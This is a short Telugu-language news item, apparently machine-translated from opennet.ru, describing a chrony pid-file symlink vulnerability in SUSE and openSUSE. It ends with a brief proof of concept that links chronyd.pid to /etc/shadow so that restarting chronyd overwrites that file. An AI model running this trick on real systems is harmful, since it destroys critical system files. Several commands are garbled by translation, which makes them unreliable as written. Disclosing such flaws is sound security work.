В
క్రోనీ ఇంకా అధికారాలను రీసెట్ చేయని మరియు రూట్గా రన్ అవుతున్న దశలో సృష్టించబడిన పిడ్ ఫైల్ యొక్క అసురక్షిత సృష్టి వలన ఈ దుర్బలత్వం ఏర్పడింది. ఈ సందర్భంలో, pid ఫైల్ వ్రాయబడిన /run/chrony డైరెక్టరీ, systemd-tmpfiles ద్వారా హక్కుల 0750తో సృష్టించబడింది లేదా వినియోగదారు మరియు సమూహం "క్రోనీ"తో అనుబంధంగా chronyd ప్రారంభించబడినప్పుడు. అందువల్ల, మీరు వినియోగదారు క్రోనీకి యాక్సెస్ కలిగి ఉంటే, పిడ్ ఫైల్ /run/chrony/chronyd.pidని సింబాలిక్ లింక్తో భర్తీ చేయడం సాధ్యపడుతుంది. chronyd ప్రారంభించబడినప్పుడు ఓవర్రైట్ చేయబడే ఏదైనా సిస్టమ్ ఫైల్ని సింబాలిక్ లింక్ సూచించగలదు.
రూట్# systemctl స్టాప్ chronyd.service
రూట్# సుడో -యు క్రోనీ /బిన్/బాష్
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
chrony$ నిష్క్రమణ
రూట్# /usr/sbin/chronyd -n
^C
# /etc/shadow యొక్క కంటెంట్లకు బదులుగా క్రోనిడ్ ప్రాసెస్ ID సేవ్ చేయబడుతుంది
root# cat /etc/shadow
15287
దుర్బలత్వం
SUSE మరియు openSUSE సమస్య
మూలం: opennet.ru